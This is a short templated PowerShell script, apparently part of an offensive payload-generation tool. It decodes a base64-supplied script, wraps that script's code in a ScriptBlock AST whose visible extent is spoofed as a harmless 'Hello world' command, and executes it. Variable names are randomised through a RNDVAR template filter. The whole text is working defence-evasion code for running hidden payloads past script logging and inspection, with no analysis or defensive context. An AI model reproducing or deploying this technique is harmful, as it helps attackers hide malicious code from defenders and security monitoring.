${{ 'data' | RNDVAR }} = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("{{ input }}"))
${{ 'SpoofedAst' | RNDVAR }} = [ScriptBlock]::Create("Write-Output 'Hello world'").Ast
${{ 'ExecutedAst' | RNDVAR }} = [ScriptBlock]::Create(${{ 'data' | RNDVAR }}).Ast
${{ 'Ast' | RNDVAR }} = [System.Management.Automation.Language.ScriptBlockAst]::new(${{ 'SpoofedAst' | RNDVAR }}.Extent,
   $null,
   $null,
   $null,
   ${{ 'ExecutedAst' | RNDVAR }}.EndBlock.Copy(),
   $null
)
${{ 'Sb' | RNDVAR }} = ${{ 'Ast' | RNDVAR }}.GetScriptBlock()
& ${{ 'Sb' | RNDVAR }}
